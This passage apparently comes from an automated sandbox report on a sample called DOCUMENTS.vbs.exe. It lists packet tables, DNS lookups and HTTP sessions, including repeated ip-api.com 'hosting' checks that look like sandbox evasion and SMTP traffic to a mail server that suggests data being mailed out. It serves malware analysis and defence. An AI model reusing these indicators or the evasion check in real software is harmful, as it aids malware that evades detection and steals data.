Sep 2, 2024 07:48:43.360308886 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.371273041 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.371289968 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.371346951 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.371356010 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.371418953 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.380830050 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.380847931 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.380912066 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.380919933 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.380969048 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.398067951 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.398085117 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.403364897 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.403973103 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.403989077 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.404051065 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.418414116 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.418427944 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.418493032 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.418504953 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.423724890 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.423744917 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.423814058 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.423829079 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.433048964 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.433068991 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.433131933 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.433147907 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.433165073 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.437828064 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.438429117 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:43.438486099 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:43.438515902 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:43.438538074 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:43.441972017 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.441991091 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.442047119 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.442059040 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.443433046 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.443443060 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.443447113 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.443543911 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.449759960 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.449774981 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.449847937 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.449857950 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.474967003 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.474992037 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.475056887 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.475073099 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.475096941 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.486813068 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.486829996 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.486890078 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.486903906 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.491763115 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.491781950 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.491822958 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.491831064 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.491856098 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.500577927 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.500592947 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.500646114 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.500654936 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.500680923 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.506278038 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.506299019 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.506335974 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.506344080 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.506369114 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.519470930 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.519486904 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.519562960 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.519572973 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.533662081 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.533683062 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.533724070 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.533735037 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.533757925 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.536511898 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.536526918 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.536581993 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.536600113 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.557606936 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.557627916 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.557693958 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.557715893 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.566529989 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.566545010 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.566592932 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.566610098 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.566631079 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.656177998 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.810899019 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.810910940 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.810951948 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.810972929 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.810980082 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.810998917 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.811009884 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.811033964 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.813549995 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.813558102 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.813584089 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.813611984 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.813615084 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.813623905 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.813661098 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.813671112 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.816721916 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.816737890 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.816796064 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.816807032 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.816821098 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.816842079 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.817446947 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.817465067 CEST	587	49713	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:43.817524910 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:43.820008993 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.820024967 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.820077896 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.820087910 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.820133924 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.823004007 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.823019981 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.823060036 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.823069096 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.823096037 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.823115110 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.828146935 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.828161955 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.828214884 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.828226089 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.828269958 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.831974983 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.831993103 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.832036972 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.832043886 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.832073927 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.832093954 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.835078001 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.835094929 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.835150003 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.835164070 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.835186005 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.835206985 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.838422060 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.838439941 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.838479996 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.838488102 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.838512897 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.838535070 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.842271090 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.842288971 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.842355967 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.842365026 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.842411995 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.845859051 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.845875978 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.845915079 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.845922947 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.845951080 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.845973969 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.849885941 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.849904060 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.849944115 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.849951982 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.849977970 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.850003004 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.853018045 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.853033066 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.853099108 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.853110075 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.853154898 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.855629921 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.855650902 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.855684996 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.855691910 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.855717897 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.855737925 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.857501030 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.857520103 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.857580900 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.857589960 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.857629061 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.860466003 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.860492945 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.860527039 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.860538960 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.860564947 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.860588074 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.863588095 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.863606930 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.863691092 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.863699913 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.863742113 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.865883112 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.865899086 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.865946054 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.865955114 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.865999937 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.867564917 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.867582083 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.867639065 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.867650986 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.867691994 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.869401932 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.869420052 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.869494915 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.869505882 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.869545937 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.872217894 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.872234106 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.872314930 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.872323990 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.872365952 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.872975111 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.873040915 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.873040915 CEST	443	49714	5.144.130.41	192.168.2.8
Sep 2, 2024 07:48:43.873120070 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:43.873651028 CEST	49714	443	192.168.2.8	5.144.130.41
Sep 2, 2024 07:48:46.110579014 CEST	49715	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:46.115680933 CEST	80	49715	208.95.112.1	192.168.2.8
Sep 2, 2024 07:48:46.115745068 CEST	49715	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:46.115984917 CEST	49715	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:46.121177912 CEST	80	49715	208.95.112.1	192.168.2.8
Sep 2, 2024 07:48:46.582146883 CEST	80	49715	208.95.112.1	192.168.2.8
Sep 2, 2024 07:48:46.703058958 CEST	49715	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:47.311141968 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:47.321207047 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:47.321279049 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:47.980976105 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:47.981287003 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:47.987226009 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.127228022 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.127403975 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:48.132965088 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.274234056 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.278865099 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:48.285820007 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.435678005 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.435770035 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.435781956 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.435827971 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:48.437745094 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:48.442630053 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.582716942 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.595638037 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:48.600464106 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.740298986 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.741156101 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:48.745981932 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.886473894 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:48.886811972 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:48.893228054 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.156258106 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.156590939 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:49.167610884 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.308049917 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.308809996 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:49.313715935 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.338954926 CEST	49713	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:49.339473963 CEST	49712	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:48:49.565416098 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.565642118 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:49.570388079 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.709954023 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.710707903 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:49.710793018 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:49.710824013 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:49.710921049 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:48:49.715565920 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.715631008 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.715753078 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.715800047 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.912533045 CEST	587	49716	173.254.28.210	192.168.2.8
Sep 2, 2024 07:48:49.968703032 CEST	49716	587	192.168.2.8	173.254.28.210
Sep 2, 2024 07:49:37.313035011 CEST	49715	80	192.168.2.8	208.95.112.1
Sep 2, 2024 07:49:37.318674088 CEST	80	49715	208.95.112.1	192.168.2.8
Sep 2, 2024 07:49:37.318756104 CEST	49715	80	192.168.2.8	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2024 07:48:03.590290070 CEST	63992	53	192.168.2.8	1.1.1.1
Sep 2, 2024 07:48:03.673362970 CEST	53	63992	1.1.1.1	192.168.2.8
Sep 2, 2024 07:48:16.376492023 CEST	49373	53	192.168.2.8	1.1.1.1
Sep 2, 2024 07:48:16.383306026 CEST	53	49373	1.1.1.1	192.168.2.8
Sep 2, 2024 07:48:18.352008104 CEST	64950	53	192.168.2.8	1.1.1.1
Sep 2, 2024 07:48:18.571046114 CEST	53	64950	1.1.1.1	192.168.2.8
Sep 2, 2024 07:48:46.095978022 CEST	50559	53	192.168.2.8	1.1.1.1
Sep 2, 2024 07:48:46.103827000 CEST	53	50559	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 2, 2024 07:48:03.590290070 CEST	192.168.2.8	1.1.1.1	0x9e94	Standard query (0)	etehadshipping.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 07:48:16.376492023 CEST	192.168.2.8	1.1.1.1	0xd039	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 07:48:18.352008104 CEST	192.168.2.8	1.1.1.1	0xa721	Standard query (0)	mail.topcats.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 07:48:46.095978022 CEST	192.168.2.8	1.1.1.1	0xf800	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 2, 2024 07:48:03.673362970 CEST	1.1.1.1	192.168.2.8	0x9e94	No error (0)	etehadshipping.com	5.144.130.41	A (IP address)	IN (0x0001)	false
Sep 2, 2024 07:48:16.383306026 CEST	1.1.1.1	192.168.2.8	0xd039	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Sep 2, 2024 07:48:18.571046114 CEST	1.1.1.1	192.168.2.8	0xa721	No error (0)	mail.topcats.com	173.254.28.210	A (IP address)	IN (0x0001)	false
Sep 2, 2024 07:48:46.103827000 CEST	1.1.1.1	192.168.2.8	0xf800	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

etehadshipping.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	208.95.112.1	80	8116	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 07:48:16.394056082 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Sep 2, 2024 07:48:16.835444927 CEST	175	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 05:48:15 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	208.95.112.1	80	1568	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 07:48:38.124459982 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Sep 2, 2024 07:48:38.572321892 CEST	175	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 05:48:37 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 38 X-Rl: 43 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	208.95.112.1	80	7752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 07:48:46.115984917 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Sep 2, 2024 07:48:46.582146883 CEST	175	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 05:48:45 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 30 X-Rl: 42 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	5.144.130.41	443	7804	C:\Users\user\Desktop\DOCUMENTS.vbs.exe

